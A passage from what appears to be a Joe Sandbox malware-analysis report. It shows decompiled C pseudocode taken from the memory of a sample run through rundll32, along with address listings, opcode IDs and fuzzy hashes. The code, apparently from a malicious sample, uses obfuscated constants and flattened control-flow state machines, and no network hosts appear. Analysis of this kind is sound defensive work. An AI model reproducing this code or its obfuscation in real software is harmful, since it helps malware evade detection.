                                                                                                                      				_v164 = _v164 << 9;
                                                                                                                      				_v164 = _v164 * 0x65;
                                                                                                                      				_v164 = _v164 ^ 0x02abce10;
                                                                                                                      				_v156 = 0x59a8bb;
                                                                                                                      				_v156 = _v156 >> 0xb;
                                                                                                                      				_v156 = _v156 + 0x17fc;
                                                                                                                      				_v156 = _v156 ^ 0x000023b1;
                                                                                                                      				goto L1;
                                                                                                                      				do {
                                                                                                                      					while(1) {
                                                                                                                      						L1:
                                                                                                                      						_t519 = _t448 - 0x5a88f65;
                                                                                                                      						if(_t519 > 0) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						if(_t519 == 0) {
                                                                                                                      							_t500 =  *_t446;
                                                                                                                      							E002CFA99(_v112, _v132, _v216, _v200, _t500);
                                                                                                                      							_t501 = _t500 + _v124;
                                                                                                                      							E002CFD29(_v84, _v244, _t501, _v184, _v80);
                                                                                                                      							_t502 = _t501 + _v80;
                                                                                                                      							_push(_v148);
                                                                                                                      							_push(_v172);
                                                                                                                      							_push(_t513);
                                                                                                                      							E002B5894(_t502, _v176);
                                                                                                                      							_t493 =  &(_t502[_t513]);
                                                                                                                      							_t515 = _t515 + 0x24;
                                                                                                                      							_t458 = _t502;
                                                                                                                      							if(_t502 >= _t493) {
                                                                                                                      								L15:
                                                                                                                      								_t432 = E002BEF71(0, 0xe);
                                                                                                                      								_t448 = 0x44ef61d;
                                                                                                                      								 *((char*)(_t432 + _t502)) = 0;
                                                                                                                      								_t499 = _v92;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								goto L12;
                                                                                                                      							}
                                                                                                                      							do {
                                                                                                                      								L12:
                                                                                                                      								if(( *_t458 & 0x000000ff) == _v236) {
                                                                                                                      									 *_t458 = 0xc3;
                                                                                                                      								}
                                                                                                                      								_t458 =  &(_t458[1]);
                                                                                                                      							} while (_t458 < _t493);
                                                                                                                      							goto L15;
                                                                                                                      						}
                                                                                                                      						if(_t448 == 0xb503f3) {
                                                                                                                      							_t448 = 0xf32de15;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t448 == 0x231aa40) {
                                                                                                                      							_t435 = E002C45CD(_v192,  &_v76,  &_v84);
                                                                                                                      							asm("sbb ecx, ecx");
                                                                                                                      							_t448 = ( ~_t435 & 0xfac85eed) + 0xa894c28;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t448 == 0x44ef61d) {
                                                                                                                      							E002B68DE(_v232, _v208, _v240, _v100, _v84);
                                                                                                                      							_t515 = _t515 + 0xc;
                                                                                                                      							_t448 = 0xa894c28;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t448 != 0x551ab15) {
                                                                                                                      							goto L28;
                                                                                                                      						}
                                                                                                                      						_t513 = E002BEF71(_v164, _v156);
                                                                                                                      						_t448 = 0xb847f8c;
                                                                                                                      						 *((intOrPtr*)(_t446 + 4)) = _v140 + _v80 + _t513;
                                                                                                                      					}
                                                                                                                      					if(_t448 == 0xa894c28) {
                                                                                                                      						E002B68DE(_v152, _v180, _v160, _v188, _v76);
                                                                                                                      						_t515 = _t515 + 0xc;
                                                                                                                      						_t448 = 0x47d0478;
                                                                                                                      						goto L28;
                                                                                                                      					}
                                                                                                                      					if(_t448 == 0xb847f8c) {
                                                                                                                      						_push(_t448);
                                                                                                                      						_push(_t448);
                                                                                                                      						_t419 = E002C3512( *((intOrPtr*)(_t446 + 4)));
                                                                                                                      						 *_t446 = _t419;
                                                                                                                      						if(_t419 == 0) {
                                                                                                                      							_t448 = 0x44ef61d;
                                                                                                                      						} else {
                                                                                                                      							_t448 = 0x5a88f65;
                                                                                                                      							_t499 = 1;
                                                                                                                      							_v92 = 1;
                                                                                                                      						}
                                                                                                                      						goto L1;
                                                                                                                      					}
                                                                                                                      					if(_t448 == 0xe73b6d2) {
                                                                                                                      						_v48 = _v88;
                                                                                                                      						_v52 = 0x20;
                                                                                                                      						_v56 =  &_v32;
                                                                                                                      						_v64 =  *_t498;
                                                                                                                      						_v60 =  *((intOrPtr*)(_t498 + 4));
                                                                                                                      						_t424 = E002CFF31( &_v76,  &_v68, _v144, _v196, _v204);
                                                                                                                      						_t515 = _t515 + 0xc;
                                                                                                                      						if(_t424 == 0) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						_t448 = 0x231aa40;
                                                                                                                      						goto L1;
                                                                                                                      					}
                                                                                                                      					if(_t448 != 0xf32de15) {
                                                                                                                      						goto L28;
                                                                                                                      					}
                                                                                                                      					_push( *_t498);
                                                                                                                      					_t444 = E002C1831(_v212, _v220,  &_v32, _v96, _t448,  *((intOrPtr*)(_t498 + 4)));
                                                                                                                      					_t515 = _t515 + 0x18;
                                                                                                                      					if(_t444 == 0) {
                                                                                                                      						break;
                                                                                                                      					}
                                                                                                                      					_t448 = 0xe73b6d2;
                                                                                                                      					goto L1;
                                                                                                                      					L28:
                                                                                                                      				} while (_t448 != 0x47d0478);
                                                                                                                      				return _t499;
                                                                                                                      			}
                                                                                                                      0x002b268f
                                                                                                                      0x002b2692
                                                                                                                      0x002b2695
                                                                                                                      0x002b2699
                                                                                                                      0x002b26ac
                                                                                                                      0x002b26bb
                                                                                                                      0x002b26c2
                                                                                                                      0x002b26c7
                                                                                                                      0x002b26cb
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b269b
                                                                                                                      0x002b269b
                                                                                                                      0x002b26a2
                                                                                                                      0x002b26a4
                                                                                                                      0x002b26a4
                                                                                                                      0x002b26a7
                                                                                                                      0x002b26a8
                                                                                                                      0x00000000
                                                                                                                      0x002b269b
                                                                                                                      0x002b2567
                                                                                                                      0x002b2621
                                                                                                                      0x00000000
                                                                                                                      0x002b2621
                                                                                                                      0x002b2573
                                                                                                                      0x002b2603
                                                                                                                      0x002b260e
                                                                                                                      0x002b2616
                                                                                                                      0x00000000
                                                                                                                      0x002b2616
                                                                                                                      0x002b257b
                                                                                                                      0x002b25d9
                                                                                                                      0x002b25de
                                                                                                                      0x002b25e1
                                                                                                                      0x00000000
                                                                                                                      0x002b25e1
                                                                                                                      0x002b2583
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b25a1
                                                                                                                      0x002b25b5
                                                                                                                      0x002b25ba
                                                                                                                      0x002b25ba
                                                                                                                      0x002b26dd
                                                                                                                      0x002b280a
                                                                                                                      0x002b280f
                                                                                                                      0x002b2812
                                                                                                                      0x00000000
                                                                                                                      0x002b2812
                                                                                                                      0x002b26e9
                                                                                                                      0x002b27c3
                                                                                                                      0x002b27c4
                                                                                                                      0x002b27c8
                                                                                                                      0x002b27cd
                                                                                                                      0x002b27d3
                                                                                                                      0x002b27e9
                                                                                                                      0x002b27d5
                                                                                                                      0x002b27d7
                                                                                                                      0x002b27dc
                                                                                                                      0x002b27dd
                                                                                                                      0x002b27dd
                                                                                                                      0x00000000
                                                                                                                      0x002b27d3
                                                                                                                      0x002b26f5
                                                                                                                      0x002b2757
                                                                                                                      0x002b2773
                                                                                                                      0x002b277e
                                                                                                                      0x002b2787
                                                                                                                      0x002b2791
                                                                                                                      0x002b2798
                                                                                                                      0x002b279d
                                                                                                                      0x002b27a2
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b27a4
                                                                                                                      0x00000000
                                                                                                                      0x002b27a4
                                                                                                                      0x002b26fd
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b2703
                                                                                                                      0x002b2727
                                                                                                                      0x002b272c
                                                                                                                      0x002b2731
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b2737
                                                                                                                      0x00000000
                                                                                                                      0x002b2817
                                                                                                                      0x002b2817
                                                                                                                      0x002b282f

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $+E,$f,$E
                                                                                                                      • API String ID: 0-1056989491
                                                                                                                      • Opcode ID: f924d05836e70ef0a09e8ac1d4695ea004385d1c302f03348df483147d80d69e
                                                                                                                      • Instruction ID: e46f24f385e242350f0b455de8645648ce3b167f8f7a49c5b78aeb205fc589bd
                                                                                                                      • Opcode Fuzzy Hash: f924d05836e70ef0a09e8ac1d4695ea004385d1c302f03348df483147d80d69e
                                                                                                                      • Instruction Fuzzy Hash: BA223FB1518380CFD368CF25C58AA9BFBE1FBC4748F10891DE6998A260D7B19959CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E002CCC89(intOrPtr* __edx, intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                      				char _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				void* __ecx;
                                                                                                                      				void* _t283;
                                                                                                                      				intOrPtr _t315;
                                                                                                                      				void* _t316;
                                                                                                                      				intOrPtr _t320;
                                                                                                                      				intOrPtr _t324;
                                                                                                                      				void* _t325;
                                                                                                                      				intOrPtr* _t328;
                                                                                                                      				void* _t330;
                                                                                                                      				void* _t365;
                                                                                                                      				signed int _t368;
                                                                                                                      				signed int _t369;
                                                                                                                      				signed int _t370;
                                                                                                                      				signed int _t371;
                                                                                                                      				signed int _t372;
                                                                                                                      				signed int _t373;
                                                                                                                      				signed int _t374;
                                                                                                                      				signed int _t375;
                                                                                                                      				signed int _t376;
                                                                                                                      				signed int _t377;
                                                                                                                      				signed int _t378;
                                                                                                                      				signed int* _t381;
                                                                                                                      
                                                                                                                      				_t367 = _a4;
                                                                                                                      				_t328 = __edx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				E002BCF25(_t283);
                                                                                                                      				_v60 = 0x688185;
                                                                                                                      				_t381 =  &(( &_v116)[4]);
                                                                                                                      				_v60 = _v60 ^ 0x6a5ee641;
                                                                                                                      				_t6 =  &_v60; // 0x6a5ee641
                                                                                                                      				_t365 = 0;
                                                                                                                      				_t330 = 0xb7d839b;
                                                                                                                      				_t368 = 0x77;
                                                                                                                      				_v60 =  *_t6 * 0x53;
                                                                                                                      				_v60 = _v60 ^ 0x6fa3a48d;
                                                                                                                      				_v36 = 0x2ce9a9;
                                                                                                                      				_v36 = _v36 / _t368;
                                                                                                                      				_v36 = _v36 ^ 0x0000609f;
                                                                                                                      				_v72 = 0x8d05d4;
                                                                                                                      				_v72 = _v72 + 0xfffff9ae;
                                                                                                                      				_v72 = _v72 + 0xfffffb99;
                                                                                                                      				_v72 = _v72 + 0xffff1821;
                                                                                                                      				_v72 = _v72 ^ 0x008c133c;
                                                                                                                      				_v84 = 0xdf93a7;
                                                                                                                      				_v84 = _v84 + 0x158a;
                                                                                                                      				_v84 = _v84 | 0xa6edaf65;
                                                                                                                      				_v84 = _v84 ^ 0xa6ffaf75;
                                                                                                                      				_v16 = 0x181fb2;
                                                                                                                      				_v16 = _v16 >> 0xb;
                                                                                                                      				_v16 = _v16 ^ 0x00000303;
                                                                                                                      				_v40 = 0xf7fe46;
                                                                                                                      				_v40 = _v40 >> 4;
                                                                                                                      				_v40 = _v40 ^ 0x000f7fe4;
                                                                                                                      				_v96 = 0x7307ab;
                                                                                                                      				_v96 = _v96 + 0xffff98a0;
                                                                                                                      				_v96 = _v96 ^ 0x207b23a6;
                                                                                                                      				_t369 = 7;
                                                                                                                      				_v96 = _v96 / _t369;
                                                                                                                      				_v96 = _v96 ^ 0x0493a521;
                                                                                                                      				_v68 = 0xb0f7c2;
                                                                                                                      				_v68 = _v68 + 0xa001;
                                                                                                                      				_v68 = _v68 + 0xf927;
                                                                                                                      				_t370 = 0x1b;
                                                                                                                      				_v68 = _v68 / _t370;
                                                                                                                      				_v68 = _v68 ^ 0x0001298b;
                                                                                                                      				_v20 = 0x9a8fe8;
                                                                                                                      				_v20 = _v20 >> 0xb;
                                                                                                                      				_v20 = _v20 ^ 0x0008eae3;
                                                                                                                      				_v76 = 0xc447f;
                                                                                                                      				_v76 = _v76 << 2;
                                                                                                                      				_v76 = _v76 ^ 0x6da7c905;
                                                                                                                      				_v76 = _v76 | 0x8e440162;
                                                                                                                      				_v76 = _v76 ^ 0xefde5c32;
                                                                                                                      				_v80 = 0xe5293a;
                                                                                                                      				_v80 = _v80 ^ 0x7ea2fbd4;
                                                                                                                      				_v80 = _v80 << 6;
                                                                                                                      				_v80 = _v80 >> 0x10;
                                                                                                                      				_v80 = _v80 ^ 0x000bb464;
                                                                                                                      				_v24 = 0xaea513;
                                                                                                                      				_v24 = _v24 ^ 0xb7e1a43c;
                                                                                                                      				_v24 = _v24 ^ 0xb74b462d;
                                                                                                                      				_v28 = 0x6b2191;
                                                                                                                      				_v28 = _v28 | 0x9c0eb3e2;
                                                                                                                      				_v28 = _v28 ^ 0x9c639c10;
                                                                                                                      				_v32 = 0x4e8823;
                                                                                                                      				_t371 = 0xe;
                                                                                                                      				_v32 = _v32 / _t371;
                                                                                                                      				_v32 = _v32 ^ 0x000823cf;
                                                                                                                      				_v88 = 0x8b37c7;
                                                                                                                      				_v88 = _v88 + 0x96e4;
                                                                                                                      				_t372 = 0x63;
                                                                                                                      				_v88 = _v88 / _t372;
                                                                                                                      				_t373 = 0x18;
                                                                                                                      				_v88 = _v88 / _t373;
                                                                                                                      				_v88 = _v88 ^ 0x000cd8d0;
                                                                                                                      				_v92 = 0x8ccaf;
                                                                                                                      				_v92 = _v92 + 0xffff7c77;
                                                                                                                      				_v92 = _v92 >> 7;
                                                                                                                      				_t374 = 0x1a;
                                                                                                                      				_v92 = _v92 * 0x4a;
                                                                                                                      				_v92 = _v92 ^ 0x000ee576;
                                                                                                                      				_v100 = 0x6d8220;
                                                                                                                      				_v100 = _v100 + 0xffffba59;
                                                                                                                      				_v100 = _v100 / _t374;
                                                                                                                      				_v100 = _v100 + 0x20d5;
                                                                                                                      				_v100 = _v100 ^ 0x000e9a10;
                                                                                                                      				_v104 = 0xccaba6;
                                                                                                                      				_t375 = 0x29;
                                                                                                                      				_v104 = _v104 / _t375;
                                                                                                                      				_t376 = 0x69;
                                                                                                                      				_v104 = _v104 / _t376;
                                                                                                                      				_v104 = _v104 + 0xffff1a57;
                                                                                                                      				_v104 = _v104 ^ 0xfff2229f;
                                                                                                                      				_v44 = 0x73a08b;
                                                                                                                      				_v44 = _v44 / _t376;
                                                                                                                      				_v44 = _v44 ^ 0x0004e5c5;
                                                                                                                      				_v108 = 0xb1e3bd;
                                                                                                                      				_v108 = _v108 ^ 0x0f8130c9;
                                                                                                                      				_v108 = _v108 + 0x5ac4;
                                                                                                                      				_t377 = 0x21;
                                                                                                                      				_v108 = _v108 / _t377;
                                                                                                                      				_v108 = _v108 ^ 0x0077ef5a;
                                                                                                                      				_v112 = 0x4cec76;
                                                                                                                      				_t192 =  &_v112; // 0x4cec76
                                                                                                                      				_v112 =  *_t192 * 0x1a;
                                                                                                                      				_v112 = _v112 + 0xdd93;
                                                                                                                      				_v112 = _v112 << 6;
                                                                                                                      				_v112 = _v112 ^ 0xf432eb29;
                                                                                                                      				_v116 = 0x879801;
                                                                                                                      				_v116 = _v116 + 0x9229;
                                                                                                                      				_v116 = _v116 << 3;
                                                                                                                      				_v116 = _v116 | 0xee96daec;
                                                                                                                      				_v116 = _v116 ^ 0xeed13984;
                                                                                                                      				_v64 = 0x9b79ce;
                                                                                                                      				_v64 = _v64 >> 0xe;
                                                                                                                      				_t378 = 0x5f;
                                                                                                                      				_v64 = _v64 * 0x1e;
                                                                                                                      				_v64 = _v64 | 0xf7dc9e8a;
                                                                                                                      				_v64 = _v64 ^ 0xf7d2a70d;
                                                                                                                      				_v48 = 0x898fb;
                                                                                                                      				_v48 = _v48 << 0xa;
                                                                                                                      				_v48 = _v48 * 0x4f;
                                                                                                                      				_v48 = _v48 ^ 0x9cd9bf24;
                                                                                                                      				_v52 = 0xd43737;
                                                                                                                      				_v52 = _v52 << 9;
                                                                                                                      				_v52 = _v52 / _t378;
                                                                                                                      				_v52 = _v52 ^ 0x01c68cd1;
                                                                                                                      				_v56 = 0x1c405f;
                                                                                                                      				_v56 = _v56 >> 0xa;
                                                                                                                      				_v56 = _v56 | 0xb1ef7bec;
                                                                                                                      				_v56 = _v56 ^ 0xb1edddf2;
                                                                                                                      				do {
                                                                                                                      					while(_t330 != 0x6ea4fc1) {
                                                                                                                      						if(_t330 == 0x7f0f713) {
                                                                                                                      							_push(_t330);
                                                                                                                      							_push(_t330);
                                                                                                                      							_t320 = E002C3512(_v8);
                                                                                                                      							_v12 = _t320;
                                                                                                                      							if(_t320 != 0) {
                                                                                                                      								_t330 = 0xa80f622;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							if(_t330 == 0x7f61550) {
                                                                                                                      								E002B68DE(_v64, _v48, _v52, _v56, _v12);
                                                                                                                      							} else {
                                                                                                                      								if(_t330 == 0xa80f622) {
                                                                                                                      									_t324 =  *0x2d5c9c; // 0x0
                                                                                                                      									_t325 = E002BB335(_v100,  *_t367, _v104,  *((intOrPtr*)(_t324 + 0x50)), _v36, _t330, _v40,  &_v8, _v44,  *((intOrPtr*)(_t367 + 4)), _v108, _v112, _v12, _v116, _t330, _v8);
                                                                                                                      									_t381 =  &(_t381[0xe]);
                                                                                                                      									if(_t325 == _v96) {
                                                                                                                      										 *_t328 = _v12;
                                                                                                                      										_t365 = 1;
                                                                                                                      										 *((intOrPtr*)(_t328 + 4)) = _v8;
                                                                                                                      									} else {
                                                                                                                      										_t330 = 0x7f61550;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t330 != 0xb7d839b) {
                                                                                                                      										goto L14;
                                                                                                                      									} else {
                                                                                                                      										_t330 = 0x6ea4fc1;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L18:
                                                                                                                      						return _t365;
                                                                                                                      					}
                                                                                                                      					_t315 =  *0x2d5c9c; // 0x0
                                                                                                                      					_t316 = E002BB335(_v68,  *_t367, _v20,  *((intOrPtr*)(_t315 + 0x50)), _v60, _t330, _v72,  &_v8, _v76,  *((intOrPtr*)(_t367 + 4)), _v80, _v24, _t365, _v28, _t330, _v84);
                                                                                                                      					_t381 =  &(_t381[0xe]);
                                                                                                                      					if(_t316 != _v16) {
                                                                                                                      						_t330 = 0x33d9eeb;
                                                                                                                      						goto L14;
                                                                                                                      					} else {
                                                                                                                      						_t330 = 0x7f0f713;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L18;
                                                                                                                      					L14:
                                                                                                                      				} while (_t330 != 0x33d9eeb);
                                                                                                                      				goto L18;
                                                                                                                      			}

                                                                                                                      0x002ccfda
                                                                                                                      0x002ccfdb
                                                                                                                      0x002ccfdf
                                                                                                                      0x002ccfe7
                                                                                                                      0x002ccfef
                                                                                                                      0x002ccff7
                                                                                                                      0x002cd001
                                                                                                                      0x002cd005
                                                                                                                      0x002cd00d
                                                                                                                      0x002cd015
                                                                                                                      0x002cd025
                                                                                                                      0x002cd029
                                                                                                                      0x002cd031
                                                                                                                      0x002cd039
                                                                                                                      0x002cd03e
                                                                                                                      0x002cd046
                                                                                                                      0x002cd04e
                                                                                                                      0x002cd04e
                                                                                                                      0x002cd05c
                                                                                                                      0x002cd0f6
                                                                                                                      0x002cd0f7
                                                                                                                      0x002cd0ff
                                                                                                                      0x002cd104
                                                                                                                      0x002cd10f
                                                                                                                      0x002cd115
                                                                                                                      0x00000000
                                                                                                                      0x002cd115
                                                                                                                      0x002cd062
                                                                                                                      0x002cd068
                                                                                                                      0x002cd1af
                                                                                                                      0x002cd06e
                                                                                                                      0x002cd074
                                                                                                                      0x002cd0bc
                                                                                                                      0x002cd0ce
                                                                                                                      0x002cd0d3
                                                                                                                      0x002cd0da
                                                                                                                      0x002cd18f
                                                                                                                      0x002cd191
                                                                                                                      0x002cd196
                                                                                                                      0x002cd0e0
                                                                                                                      0x002cd0e0
                                                                                                                      0x00000000
                                                                                                                      0x002cd0e0
                                                                                                                      0x002cd076
                                                                                                                      0x002cd07c
                                                                                                                      0x00000000
                                                                                                                      0x002cd082
                                                                                                                      0x002cd082
                                                                                                                      0x00000000
                                                                                                                      0x002cd082
                                                                                                                      0x002cd07c
                                                                                                                      0x002cd074
                                                                                                                      0x002cd068
                                                                                                                      0x002cd1b7
                                                                                                                      0x002cd1c0
                                                                                                                      0x002cd1c0
                                                                                                                      0x002cd149
                                                                                                                      0x002cd15e
                                                                                                                      0x002cd163
                                                                                                                      0x002cd16a
                                                                                                                      0x002cd176
                                                                                                                      0x00000000
                                                                                                                      0x002cd16c
                                                                                                                      0x002cd16c
                                                                                                                      0x00000000
                                                                                                                      0x002cd16c
                                                                                                                      0x00000000
                                                                                                                      0x002cd17b
                                                                                                                      0x002cd17b
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: :)$A^j$Zw$vL
                                                                                                                      • API String ID: 0-3297297485
                                                                                                                      • Opcode ID: cb71ab8a0ca33c3c709155bed911e1f49ea9429730edc658db0a60cae110ff4b
                                                                                                                      • Instruction ID: 8eede4b2f25b1ed5c9d5ce72785e62ffd7b97287157bc8b8061b7244fb43a9b9
                                                                                                                      • Opcode Fuzzy Hash: cb71ab8a0ca33c3c709155bed911e1f49ea9429730edc658db0a60cae110ff4b
                                                                                                                      • Instruction Fuzzy Hash: FFD12FB25083819FD764CF65C949A1BFBE1FBC4748F108A2DF29586260C7B69959CF03
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E002CA156(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				char _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				intOrPtr _v136;
                                                                                                                      				char _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				signed int _v196;
                                                                                                                      				void* _t133;
                                                                                                                      				signed int _t146;
                                                                                                                      				void* _t147;
                                                                                                                      				void* _t155;
                                                                                                                      				char* _t156;
                                                                                                                      				void* _t174;
                                                                                                                      				signed int _t175;
                                                                                                                      				signed int _t176;
                                                                                                                      				signed int _t177;
                                                                                                                      				signed int _t178;
                                                                                                                      				signed int* _t183;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_t174 = __edx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E002BCF25(_t133);
                                                                                                                      				_v132 = _v132 & 0x00000000;
                                                                                                                      				_t183 =  &(( &_v196)[5]);
                                                                                                                      				_v136 = 0x446ea7;
                                                                                                                      				_v180 = 0x28766d;
                                                                                                                      				_t155 = 0x8ee0430;
                                                                                                                      				_v180 = _v180 | 0x8061b26e;
                                                                                                                      				_t175 = 0x7a;
                                                                                                                      				_v180 = _v180 / _t175;
                                                                                                                      				_v180 = _v180 ^ 0x0107c2a1;
                                                                                                                      				_v160 = 0x181348;
                                                                                                                      				_t176 = 0x24;
                                                                                                                      				_v160 = _v160 / _t176;
                                                                                                                      				_v160 = _v160 ^ 0x00002248;
                                                                                                                      				_v192 = 0xf13979;
                                                                                                                      				_v192 = _v192 + 0xffff8439;
                                                                                                                      				_v192 = _v192 << 0xb;
                                                                                                                      				_v192 = _v192 + 0x337f;
                                                                                                                      				_v192 = _v192 ^ 0x85ec5d3f;
                                                                                                                      				_v148 = 0x5e6289;
                                                                                                                      				_v148 = _v148 >> 5;
                                                                                                                      				_v148 = _v148 ^ 0x00022a63;
                                                                                                                      				_v184 = 0xe3b806;
                                                                                                                      				_v184 = _v184 + 0xc2d8;
                                                                                                                      				_v184 = _v184 | 0x759fad77;
                                                                                                                      				_v184 = _v184 ^ 0x75f287c1;
                                                                                                                      				_v168 = 0x566c5d;
                                                                                                                      				_v168 = _v168 ^ 0x750ff463;
                                                                                                                      				_v168 = _v168 ^ 0x75584e2a;
                                                                                                                      				_v152 = 0x83e247;
                                                                                                                      				_v152 = _v152 ^ 0x81f90c1d;
                                                                                                                      				_v152 = _v152 ^ 0x81706586;
                                                                                                                      				_v188 = 0x5c5a6b;
                                                                                                                      				_v188 = _v188 >> 9;
                                                                                                                      				_v188 = _v188 << 0xb;
                                                                                                                      				_v188 = _v188 >> 0xf;
                                                                                                                      				_v188 = _v188 ^ 0x00030e37;
                                                                                                                      				_v176 = 0xc154a1;
                                                                                                                      				_v176 = _v176 | 0xc3f8b8be;
                                                                                                                      				_t177 = 0x3c;
                                                                                                                      				_v176 = _v176 * 0x16;
                                                                                                                      				_v176 = _v176 ^ 0xd77414a9;
                                                                                                                      				_v164 = 0x5dd26c;
                                                                                                                      				_v164 = _v164 * 0x18;
                                                                                                                      				_v164 = _v164 ^ 0x08c2b6d4;
                                                                                                                      				_v144 = 0x980588;
                                                                                                                      				_v144 = _v144 << 3;
                                                                                                                      				_v144 = _v144 ^ 0x04c0143e;
                                                                                                                      				_v196 = 0xd24b78;
                                                                                                                      				_v196 = _v196 * 0xf;
                                                                                                                      				_v196 = _v196 * 7;
                                                                                                                      				_v196 = _v196 / _t177;
                                                                                                                      				_v196 = _v196 ^ 0x017222e8;
                                                                                                                      				_v156 = 0x8c94fd;
                                                                                                                      				_v156 = _v156 + 0xffff8671;
                                                                                                                      				_v156 = _v156 ^ 0x0082913e;
                                                                                                                      				_v172 = 0x17d6e;
                                                                                                                      				_t178 = 0x63;
                                                                                                                      				_t146 = _v172 / _t178;
                                                                                                                      				_v172 = _t146;
                                                                                                                      				_v172 = _v172 + 0x20ae;
                                                                                                                      				_v172 = _v172 ^ 0x00044ed7;
                                                                                                                      				do {
                                                                                                                      					while(_t155 != 0x2e9bf4f) {
                                                                                                                      						if(_t155 == 0x570f58c) {
                                                                                                                      							_push(0x2b1494);
                                                                                                                      							_push(_v168);
                                                                                                                      							_t147 = E002BBB4B(_v148, _v184, __eflags);
                                                                                                                      							E002CD1C1(__eflags, _t174, _v188, _v176, _t147, E002BF154(__eflags), _v164, _v144);
                                                                                                                      							return E002BAE03(_v196, _v156, _v172, _t147);
                                                                                                                      						}
                                                                                                                      						if(_t155 == 0x8ee0430) {
                                                                                                                      							_t155 = 0xffbee7a;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t155 != 0xffbee7a) {
                                                                                                                      							goto L17;
                                                                                                                      						}
                                                                                                                      						_v140 = 0x80;
                                                                                                                      						_t146 = E002C3F73(_v180, _v160,  &_v140, _v192,  &_v128);
                                                                                                                      						_t183 =  &(_t183[3]);
                                                                                                                      						_t155 = 0x2e9bf4f;
                                                                                                                      					}
                                                                                                                      					__eflags = _v128;
                                                                                                                      					_t156 =  &_v128;
                                                                                                                      					if(_v128 == 0) {
                                                                                                                      						L16:
                                                                                                                      						_t155 = 0x570f58c;
                                                                                                                      						goto L17;
                                                                                                                      					} else {
                                                                                                                      						goto L8;
                                                                                                                      					}
                                                                                                                      					do {
                                                                                                                      						L8:
                                                                                                                      						_t146 =  *_t156;
                                                                                                                      						__eflags = _t146 - 0x30;
                                                                                                                      						if(_t146 < 0x30) {
                                                                                                                      							L10:
